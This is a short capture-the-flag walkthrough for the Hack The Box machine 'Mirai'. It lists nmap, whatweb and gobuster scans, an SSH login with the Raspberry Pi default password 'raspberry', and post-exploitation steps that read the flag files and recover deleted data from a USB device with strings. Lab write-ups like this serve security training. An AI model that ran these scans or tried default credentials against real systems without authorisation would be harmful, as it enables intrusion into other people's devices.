Mirai - Hack The Box
Reconnaissance
- Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.10.48
- Vulnerability and version scan
nmap -sCV -p22,53,80,1088,32400 -vvv 10.10.10.48
- Whatweb
whatweb http://10.10.10.48/
- Gobuster
gobuster dir -u http://10.10.10.48/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
Exploitation
- Connect SSH with Raspberry default credentials
ssh pi@10.10.10.48
raspberry
Post-exploitation
- Check sudoers
sudo -l
- Search root flag
find / -name root.txt
cat /root/root.txt
- List partitions
lsblk
- List content of usb
cat /media/usbstick/damnit.txt
- View deleted content
strings /dev/sdb
